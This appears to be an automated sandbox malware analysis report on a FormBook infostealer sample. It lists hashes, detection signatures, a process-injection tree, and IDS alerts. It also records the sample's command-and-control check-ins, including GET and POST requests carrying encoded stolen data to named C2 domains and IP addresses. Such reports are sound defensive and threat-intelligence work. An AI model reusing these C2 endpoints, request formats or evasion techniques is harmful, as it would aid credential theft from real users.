Edit tour

Windows Analysis Report
YKzxWyqI6Y.exe

Overview

General Information

Sample name:	YKzxWyqI6Y.exe renamed because original name is a hash value
Original sample name:	ef322e64f7aaf33b58b0be9ec89572848e7292f3e8266573e6e25d65867c3fa5.exe
Analysis ID:	1588978
MD5:	938e53ee0f2e2d91fdc330563a4c2597
SHA1:	c8d9b347b9f5f94c1b38b657edc65c5fc0be2b96
SHA256:	ef322e64f7aaf33b58b0be9ec89572848e7292f3e8266573e6e25d65867c3fa5
Tags:	exeFormbookuser-adrian__luca
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Found direct / indirect Syscall (likely to bypass EDR)

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

YKzxWyqI6Y.exe (PID: 7292 cmdline: "C:\Users\user\Desktop\YKzxWyqI6Y.exe" MD5: 938E53EE0F2E2D91FDC330563A4C2597)

svchost.exe (PID: 7392 cmdline: "C:\Users\user\Desktop\YKzxWyqI6Y.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

cuwattsjDnLrZm.exe (PID: 1068 cmdline: "C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

logman.exe (PID: 7808 cmdline: "C:\Windows\SysWOW64\logman.exe" MD5: AE108F4DAAB2DD68470AC41F91A7A4E9)

cuwattsjDnLrZm.exe (PID: 5568 cmdline: "C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 7988 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000006.00000002.2943713333.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.2247593788.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.2943777729.0000000002FF0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.2944035557.00000000025E0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.2248443775.0000000004200000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.2945365410.00000000056F0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.2247956457.00000000039A0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.2942688422.0000000002A70000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
1.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\YKzxWyqI6Y.exe", CommandLine: "C:\Users\user\Desktop\YKzxWyqI6Y.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\YKzxWyqI6Y.exe", ParentImage: C:\Users\user\Desktop\YKzxWyqI6Y.exe, ParentProcessId: 7292, ParentProcessName: YKzxWyqI6Y.exe, ProcessCommandLine: "C:\Users\user\Desktop\YKzxWyqI6Y.exe", ProcessId: 7392, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\YKzxWyqI6Y.exe", CommandLine: "C:\Users\user\Desktop\YKzxWyqI6Y.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\YKzxWyqI6Y.exe", ParentImage: C:\Users\user\Desktop\YKzxWyqI6Y.exe, ParentProcessId: 7292, ParentProcessName: YKzxWyqI6Y.exe, ProcessCommandLine: "C:\Users\user\Desktop\YKzxWyqI6Y.exe", ProcessId: 7392, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE FormBook CnC Checkin (GET) M5

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T07:58:28.283234+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	49828	172.217.18.115	80	TCP
2025-01-11T07:58:59.786517+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	50006	194.9.94.86	80	TCP
2025-01-11T07:59:23.799409+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	50010	101.32.205.61	80	TCP

ETPRO MALWARE FormBook CnC Checkin (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T07:58:28.283234+0100	2855465	1	A Network Trojan was detected	192.168.2.4	49828	172.217.18.115	80	TCP
2025-01-11T07:58:59.786517+0100	2855465	1	A Network Trojan was detected	192.168.2.4	50006	194.9.94.86	80	TCP
2025-01-11T07:59:23.799409+0100	2855465	1	A Network Trojan was detected	192.168.2.4	50010	101.32.205.61	80	TCP

ETPRO MALWARE FormBook CnC Checkin (POST) M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T07:58:52.128657+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49984	194.9.94.86	80	TCP
2025-01-11T07:58:54.687838+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50001	194.9.94.86	80	TCP
2025-01-11T07:58:57.261004+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50005	194.9.94.86	80	TCP
2025-01-11T07:59:15.347890+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50007	101.32.205.61	80	TCP
2025-01-11T07:59:17.870864+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50008	101.32.205.61	80	TCP
2025-01-11T07:59:20.769032+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50009	101.32.205.61	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: YKzxWyqI6Y.exe	Virustotal: Detection: 55%			Perma Link
Source: YKzxWyqI6Y.exe	ReversingLabs: Detection: 79%

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.2943713333.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2247593788.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2943777729.0000000002FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2944035557.00000000025E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2248443775.0000000004200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2945365410.00000000056F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2247956457.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2942688422.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: YKzxWyqI6Y.exe

Joe Sandbox ML: detected

Source: YKzxWyqI6Y.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: logman.pdb source: svchost.exe, 00000001.00000003.2215535374.000000000341B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2215699757.0000000003432000.00000004.00000020.00020000.00000000.sdmp, cuwattsjDnLrZm.exe, 00000005.00000002.2943277721.00000000007AE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: cuwattsjDnLrZm.exe, 00000005.00000002.2942689766.000000000029E000.00000002.00000001.01000000.00000005.sdmp, cuwattsjDnLrZm.exe, 00000007.00000002.2942690387.000000000029E000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: YKzxWyqI6Y.exe, 00000000.00000003.1746935797.0000000003F70000.00000004.00001000.00020000.00000000.sdmp, YKzxWyqI6Y.exe, 00000000.00000003.1747227432.0000000004110000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2155789498.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2153734417.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2247988228.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, logman.exe, 00000006.00000002.2943995906.0000000003260000.00000040.00001000.00020000.00000000.sdmp, logman.exe, 00000006.00000003.2257801921.0000000002EA1000.00000004.00000020.00020000.00000000.sdmp, logman.exe, 00000006.00000002.2943995906.00000000033FE000.00000040.00001000.00020000.00000000.sdmp, logman.exe, 00000006.00000003.2260281687.00000000030AE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: YKzxWyqI6Y.exe, 00000000.00000003.1746935797.0000000003F70000.00000004.00001000.00020000.00000000.sdmp, YKzxWyqI6Y.exe, 00000000.00000003.1747227432.0000000004110000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2155789498.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2153734417.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2247988228.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, logman.exe, logman.exe, 00000006.00000002.2943995906.0000000003260000.00000040.00001000.00020000.00000000.sdmp, logman.exe, 00000006.00000003.2257801921.0000000002EA1000.00000004.00000020.00020000.00000000.sdmp, logman.exe, 00000006.00000002.2943995906.00000000033FE000.00000040.00001000.00020000.00000000.sdmp, logman.exe, 00000006.00000003.2260281687.00000000030AE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: logman.exe, 00000006.00000002.2944473496.000000000388C000.00000004.10000000.00040000.00000000.sdmp, logman.exe, 00000006.00000002.2942896581.0000000002DB4000.00000004.00000020.00020000.00000000.sdmp, cuwattsjDnLrZm.exe, 00000007.00000002.2944086698.00000000032BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2563084436.000000001646C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: logman.pdbGCTL source: svchost.exe, 00000001.00000003.2215535374.000000000341B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2215699757.0000000003432000.00000004.00000020.00020000.00000000.sdmp, cuwattsjDnLrZm.exe, 00000005.00000002.2943277721.00000000007AE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: logman.exe, 00000006.00000002.2944473496.000000000388C000.00000004.10000000.00040000.00000000.sdmp, logman.exe, 00000006.00000002.2942896581.0000000002DB4000.00000004.00000020.00020000.00000000.sdmp, cuwattsjDnLrZm.exe, 00000007.00000002.2944086698.00000000032BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2563084436.000000001646C000.00000004.80000000.00040000.00000000.sdmp

Source: C:\Windows\SysWOW64\logman.exe

Code function: 6_2_02A8CD00 FindFirstFileW,FindNextFileW,FindClose,

6_2_02A8CD00

Source: C:\Windows\SysWOW64\logman.exe	Code function: 4x nop then xor eax, eax	6_2_02A79F40
Source: C:\Windows\SysWOW64\logman.exe	Code function: 4x nop then mov ebx, 00000004h	6_2_031504DE
Source: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe	Code function: 4x nop then xor eax, eax	7_2_05736B27
Source: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe	Code function: 4x nop then pop edi	7_2_057312D2

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49828 -> 172.217.18.115:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49828 -> 172.217.18.115:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49984 -> 194.9.94.86:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50007 -> 101.32.205.61:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50005 -> 194.9.94.86:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50001 -> 194.9.94.86:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50010 -> 101.32.205.61:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50010 -> 101.32.205.61:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50008 -> 101.32.205.61:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50009 -> 101.32.205.61:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50006 -> 194.9.94.86:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50006 -> 194.9.94.86:80

Source: Joe Sandbox View

IP Address: 194.9.94.86 194.9.94.86

Source: Joe Sandbox View	ASN Name: LOOPIASE LOOPIASE
Source: Joe Sandbox View	ASN Name: TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /tbkw/?6v=eEnz25iqeyYaF0GZTcv88p8ZheMBIwFv/cURASnuQ31RxRodHZdUyBKgSTxpQbZzoYYkqPhfe/QfRzqscmGfeGTCq96n+NHffCm4V1X8Y6SambU/LVK/pU0=&f2yX=YHuxGZkXvzspJ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Host: www.bacoonbase.onlineConnection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/45.0.2454.68 Mobile/12B466 Safari/600.1.4
Source: global traffic	HTTP traffic detected: GET /2k8x/?f2yX=YHuxGZkXvzspJ&6v=5nrdHWUNGS1CeY1Dh+rNddjFA4ZoxwgtjTeQm53Oktjb1QtNMH0S/EnF9U1Zn/JeNK36dHzBWfQ8GG9tXE0SKiGA5TTa6RuRaUI/YxJ3aHSvnxfPbfXWpMw= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Host: www.myndighetssupport.orgConnection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/45.0.2454.68 Mobile/12B466 Safari/600.1.4
Source: global traffic	HTTP traffic detected: GET /6xqt/?f2yX=YHuxGZkXvzspJ&6v=5+yBqFkMyRtNr+GeOMKnnCL8jbElscQwzEvWA86+RKe5k7i8BTcok4cHFvnpp+lCvMgcXFd4BCCry6S6UOloceQcAmQNddIHBDsKYw5bAFXTOryRDlwOHlE= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Host: www.rwse6wjx.sbsConnection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/45.0.2454.68 Mobile/12B466 Safari/600.1.4

Source: global traffic	DNS traffic detected: DNS query: www.bacoonbase.online
Source: global traffic	DNS traffic detected: DNS query: www.kevmedia.online
Source: global traffic	DNS traffic detected: DNS query: www.myndighetssupport.org
Source: global traffic	DNS traffic detected: DNS query: www.dfr88.top
Source: global traffic	DNS traffic detected: DNS query: www.rwse6wjx.sbs

Source: unknown

HTTP traffic detected: POST /2k8x/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brHost: www.myndighetssupport.orgOrigin: http://www.myndighetssupport.orgReferer: http://www.myndighetssupport.org/2k8x/Cache-Control: max-age=0Connection: closeContent-Length: 199Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/45.0.2454.68 Mobile/12B466 Safari/600.1.4Data Raw: 36 76 3d 30 6c 44 39 45 69 6f 6c 44 68 46 59 63 49 42 75 6c 50 72 77 64 76 44 4a 43 6f 64 4f 33 67 67 4e 6f 46 2b 67 37 2b 72 51 78 2f 6a 75 30 44 73 52 48 33 34 6d 6f 6c 43 5a 36 55 67 48 38 4e 68 30 50 59 72 6f 50 30 6a 72 63 2b 49 71 4b 43 34 33 64 53 6b 4f 4a 77 6a 47 7a 69 7a 46 30 6d 79 4c 52 56 6b 4e 66 54 39 78 61 41 66 43 39 57 50 67 53 59 58 68 71 36 63 73 39 36 73 50 48 6f 43 71 65 32 39 51 42 6f 57 5a 74 48 49 6a 49 4d 56 56 71 41 61 73 70 67 56 30 6e 43 6a 4c 4c 53 4c 52 48 59 53 33 67 65 62 39 69 6e 33 57 6b 42 31 64 47 54 41 55 39 4b 72 46 39 31 76 46 5a 59 4f 39 57 41 3d 3d Data Ascii: 6v=0lD9EiolDhFYcIBulPrwdvDJCodO3ggNoF+g7+rQx/ju0DsRH34molCZ6UgH8Nh0PYroP0jrc+IqKC43dSkOJwjGzizF0myLRVkNfT9xaAfC9WPgSYXhq6cs96sPHoCqe29QBoWZtHIjIMVVqAaspgV0nCjLLSLRHYS3geb9in3WkB1dGTAU9KrF91vFZYO9WA==

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: TengineDate: Sat, 11 Jan 2025 06:59:15 GMTContent-Type: text/html; charset=utf-8Content-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: TengineDate: Sat, 11 Jan 2025 06:59:17 GMTContent-Type: text/html; charset=utf-8Content-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: TengineDate: Sat, 11 Jan 2025 06:59:20 GMTContent-Type: text/html; charset=utf-8Content-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: TengineDate: Sat, 11 Jan 2025 06:59:23 GMTContent-Type: text/html; charset=utf-8Content-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Source: logman.exe, 00000006.00000002.2946027272.0000000006300000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000006.00000002.2944473496.0000000003F98000.00000004.10000000.00040000.00000000.sdmp, cuwattsjDnLrZm.exe, 00000007.00000002.2944086698.00000000039C8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut
Source: cuwattsjDnLrZm.exe, 00000007.00000002.2945365410.000000000577D000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.rwse6wjx.sbs
Source: cuwattsjDnLrZm.exe, 00000007.00000002.2945365410.000000000577D000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.rwse6wjx.sbs/6xqt/
Source: logman.exe, 00000006.00000002.2946173667.0000000007DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: logman.exe, 00000006.00000002.2946173667.0000000007DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: logman.exe, 00000006.00000002.2946173667.0000000007DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: logman.exe, 00000006.00000002.2946173667.0000000007DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: logman.exe, 00000006.00000002.2946173667.0000000007DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: logman.exe, 00000006.00000002.2946173667.0000000007DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: logman.exe, 00000006.00000002.2946173667.0000000007DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: logman.exe, 00000006.00000002.2942896581.0000000002DCF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: logman.exe, 00000006.00000002.2942896581.0000000002DCF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: logman.exe, 00000006.00000002.2942896581.0000000002DCF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: logman.exe, 00000006.00000002.2942896581.0000000002DCF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: logman.exe, 00000006.00000002.2942896581.0000000002DCF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: logman.exe, 00000006.00000002.2942896581.0000000002DCF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
